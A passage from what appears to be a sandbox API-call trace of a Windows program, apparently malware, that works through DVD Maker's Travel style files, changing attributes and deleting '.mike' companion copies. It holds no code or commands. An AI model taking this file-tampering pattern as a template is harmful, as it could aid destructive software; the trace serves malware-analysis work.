Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", lpFilePart=0x0) returned 0x49 [0066.336] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", dwFileAttributes=0x80) returned 0 [0066.337] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", lpFilePart=0x0) returned 0x49 [0066.337] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", lpFilePart=0x0) returned 0x49 [0066.337] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png.mike")) returned 1 [0066.339] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.339] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", lpFilePart=0x0) returned 0x4c [0066.339] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", lpFilePart=0x0) returned 0x47 [0066.343] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", lpFilePart=0x0) returned 0x4c [0066.343] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", lpFilePart=0x0) returned 0x4c [0066.343] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", dwFileAttributes=0x80) returned 0 [0066.344] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", lpFilePart=0x0) returned 0x4c [0066.344] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike", lpFilePart=0x0) returned 0x4c [0066.344] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png.mike")) returned 1 [0066.347] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.347] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", lpFilePart=0x0) returned 0x4e [0066.347] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", lpFilePart=0x0) returned 0x49 [0066.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", lpFilePart=0x0) returned 0x4e [0066.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", lpFilePart=0x0) returned 0x4e [0066.378] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", dwFileAttributes=0x80) returned 0 [0066.379] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", lpFilePart=0x0) returned 0x4e [0066.379] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike", lpFilePart=0x0) returned 0x4e [0066.379] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png.mike")) returned 1 [0066.383] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", lpFilePart=0x0) returned 0x4d [0066.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", lpFilePart=0x0) returned 0x48 [0066.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", lpFilePart=0x0) returned 0x4d [0066.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", lpFilePart=0x0) returned 0x4d [0066.391] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", dwFileAttributes=0x80) returned 0 [0066.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", lpFilePart=0x0) returned 0x4d [0066.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike", lpFilePart=0x0) returned 0x4d [0066.392] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png.mike")) returned 1 [0066.395] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.395] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", lpFilePart=0x0) returned 0x44 [0066.395] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", lpFilePart=0x0) returned 0x3f [0066.415] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", lpFilePart=0x0) returned 0x44 [0066.416] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", lpFilePart=0x0) returned 0x44 [0066.416] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", dwFileAttributes=0x80) returned 0 [0066.417] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike", lpFilePart=0x0) returned 0x44 [0066.417] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png.mike")) returned 1 [0066.419] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.420] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv.mike", lpFilePart=0x0) returned 0x44 [0066.465] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv", dwFileAttributes=0x80) returned 0 [0066.467] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv.mike")) returned 1 [0066.479] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.517] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png", dwFileAttributes=0x80) returned 0 [0066.518] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png.mike")) returned 1 [0066.522] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.528] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv", dwFileAttributes=0x80) returned 0 [0066.529] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv.mike")) returned 1 [0066.531] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.539] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv", dwFileAttributes=0x80) returned 0 [0066.540] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv.mike")) returned 1 [0066.542] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.546] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png", dwFileAttributes=0x80) returned 0 [0066.547] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png.mike")) returned 1 [0066.550] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.554] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png", dwFileAttributes=0x80) returned 0 [0066.555] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png.mike")) returned 1 [0066.557] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.570] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv", dwFileAttributes=0x80) returned 0 [0066.571] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv.mike")) returned 1 [0066.574] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.592] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png", dwFileAttributes=0x80) returned 0 [0066.594] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png.mike")) returned 1 [0066.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.604] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png", dwFileAttributes=0x80) returned 0 [0066.605] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png.mike")) returned 1 [0066.608] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.616] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png", dwFileAttributes=0x80) returned 0 [0066.617] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png.mike")) returned 1 [0066.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.647] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv", dwFileAttributes=0x80) returned 0 [0066.648] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv.mike")) returned 1 [0066.651] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.658] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv", dwFileAttributes=0x80) returned 0 [0066.659] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv.mike")) returned 1 [0066.662] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.670] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv", dwFileAttributes=0x80) returned 0 [0066.671] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv.mike")) returned 1 [0066.673] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.695] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv", dwFileAttributes=0x80) returned 0 [0066.697] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv.mike")) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf107aca0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xf10c6f60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x701d, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72669a5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72669a5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553c313d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc57, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-image-inset.png", cAlternateFileName="")) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x213d, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x20d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-bullet.png", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726dbe73, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726dbe73, ftLastAccessTime.dwHighDateTime=0x1ca03fb, 